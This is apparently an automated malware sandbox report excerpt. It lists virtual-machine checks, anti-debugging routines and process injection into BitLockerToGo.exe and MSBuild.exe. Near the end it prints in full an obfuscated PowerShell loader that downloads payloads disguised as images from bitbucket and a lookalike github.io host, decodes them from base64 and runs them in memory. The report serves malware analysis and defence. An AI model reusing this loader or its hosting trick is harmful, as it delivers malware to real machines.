                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: entVers(@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: S-1-5-1 @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: soft.exe, 00000005.00000002.1722085001.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003342000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2531042833.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2277607739.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                            Source: svchost.exe, 00000004.00000002.2530328856.000001C9C5202000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: svchost.exe, 00000004.00000002.2531115725.000001C9C5302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws NT\C*@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ro
                            Source: svchost.exe, 00000004.00000002.2530586712.000001C9C5229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                            Source: soft.exeBinary or memory string: 127.0.0.1:53152587890625762939453125AMDisbetter!Align 1-ByteArchitectureAuthenticAMDBidi_ControlCIDR addressCONTINUATIONCentaurHaulsCfgMgr32.dllCoCreateGuidContent TypeContent-TypeCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNextFileGenericParamGenuine RDCGenuineIntelGenuineTMx86Geode by NSCGetAddrInfoWGetCommStateGetConsoleCPGetErrorInfoGetLastErrorGetLengthSidGetNameInfoWGetProcessIdGetStdHandleGetTempPathWHygonGenuineIntelTDX Join_ControlKVMKVMKVMKVMLittleEndianLoadLibrary LoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMicrosoft HvNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWRegister=XMMReleaseMutexReportEventWResumeThreadRevertToSelfRiseRiseRiseSERIALNUMBERSetCommBreakSetCommStateSetEndOfFileSetErrorInfoSetErrorModeSetOaNoCacheSetStdHandleSiS SiS SiS Sora_SompengSyloti_NagriSysStringLenThread32NextTransmetaCPUTransmitFileUnlockFileExVIA VIA VIA 
VMwareVMwareVarCyFromDecVarCyFromStrVarCyFromUI1VarCyFromUI2VarCyFromUI4VarCyFromUI8VarDecFromCyVarDecFromI1VarDecFromI2VarDecFromI4VarDecFromI8VarDecFromR4VarDecFromR8VarI1FromDecVarI1FromStrVarI1FromUI1VarI1FromUI2VarI1FromUI4VarI1FromUI8VarI2FromDecVarI2FromStrVarI2FromUI1VarI2FromUI2VarI2FromUI4VarI2FromUI8VarI4FromDecVarI4FromStrVarI4FromUI1VarI4FromUI2VarI4FromUI4VarI4FromUI8VarI8FromDecVarI8FromStrVarI8FromUI1VarI8FromUI2VarI8FromUI4VarI8FromUI8VarMonthNameVarR4FromDecVarR4FromStrVarR4FromUI1VarR4FromUI2VarR4FromUI4VarR4FromUI8VarR8FromDecVarR8FromStrVarR8FromUI1VarR8FromUI2VarR8FromUI4VarR8FromUI8VarUI1FromCyVarUI1FromI1VarUI1FromI2VarUI1FromI4VarUI1FromI8VarUI1FromR4VarUI1FromR8VarUI2FromCyVarUI2FromI1VarUI2FromI2VarUI2FromI4VarUI2FromI8VarUI2FromR4VarUI2FromR8VarUI4FromCyVarUI4FromI1VarUI4FromI2VarUI4FromI4VarUI4FromI8VarUI4FromR4VarUI4FromR8VarUI8FromCyVarUI8FromI1VarUI8FromI2VarUI8FromI8VarUI8FromR4VarUI8FromR8VariantClearVirtualAllocVirtualQueryVortex86 SoCXenVMMXenVMM__WSAFDIsSetabi mismatchadvapi32.dllbad flushGenbad g statusbad g0 stackbad recoverybhyve bhyve caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapecho requestend tracegc
                            Source: svchost.exe, 00000007.00000002.2530327585.0000024C27A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | API call chain: ExitProcess graph end node | graph_11-6769
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | API call chain: ExitProcess graph end node | graph_13-61916
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Process information queried: ProcessInformation

                            Anti Debugging

                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep | graph_13-62160
                            Source: C:\Windows\System32\sppsvc.exe | Process queried: DebugPort
                            Source: C:\Windows\System32\sppsvc.exe | Process queried: DebugPort
                            Source: C:\Windows\System32\sppsvc.exe | Process queried: DebugPort
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_00401808 LdrInitializeThunk,13_2_00401808
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_02BA3A18 _memset,IsDebuggerPresent,13_2_02BA3A18
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_02BAE6CE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,LdrInitializeThunk,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,13_2_02BAE6CE
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00450334
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_02B95E60 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,LdrInitializeThunk,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,13_2_02B95E60
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe | Code function: 13_2_02BA80FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_02BA80FB
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF7444E8494
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E8790 SetUnhandledExceptionFilter,14_2_00007FF7444E8790

                            HIPS / PFW / Operating System Protection Evasion

                            Source: Yara match | File source: amsi64_4704.amsi.csv, type: OTHER
                            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\soft.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000 protect: page execute and read and write
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000 value starts with: 4D5A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 486008
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 390000
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 391000
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3AD000
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BA000
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BC000
                            Source: C:\Users\user\Desktop\soft.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3BD000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 453000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 461000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 99C008
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00478DC4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,12_2_00478DC4
                            Source: C:\Users\user\Desktop\soft.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@Qg
B5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@CJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zwbm@gc@z@bm@gy@zgbm@gy@zgbm@gy@zgbm@gy@zw@v@gc@z@bm@gc@z@bm@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@l@@g@cc@a@b0@hq@c@bz@do@lw@v@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qg
b5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@ck@i@b7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@kw@9@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bi@ge@cwbl@dy@n@bm@gu@bgbn@hq@a@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
